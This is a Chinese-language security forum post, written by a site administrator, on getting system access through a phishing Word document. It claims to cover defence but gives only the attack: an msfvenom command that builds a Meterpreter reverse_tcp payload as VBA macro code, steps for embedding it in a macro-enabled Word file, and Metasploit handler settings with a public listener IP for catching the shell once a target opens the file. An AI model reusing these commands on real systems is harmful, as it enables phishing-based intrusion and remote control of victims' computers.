搜索
查看: 1519|回复: 0

通过认证邮件获取管理员权限

[复制链接]

588

主题

862

帖子

2195

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2195

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-4-23 13:53:48 | 显示全部楼层 |阅读模式

网络认证是我们日常最为常见的一种测试手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的 word excel ppt 等文档。从而获取系统权限,本期学习来说说如何防御这种测试!

emali

首先我们利用 msf 生成 vbs

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba

生成恶意 shell

设置 word

新建一个 word 文档,文件另存为 启用宏的word 文档 启用宏的 word 文档 然后 开发工具——visual Basic 选择我们的项目 ThisDocument 双击打开,粘贴我们生成的 shell。 保存完成后,配置 msf。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555

当目标运行 word 文档后,在 msf 中便会得到反弹!

有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表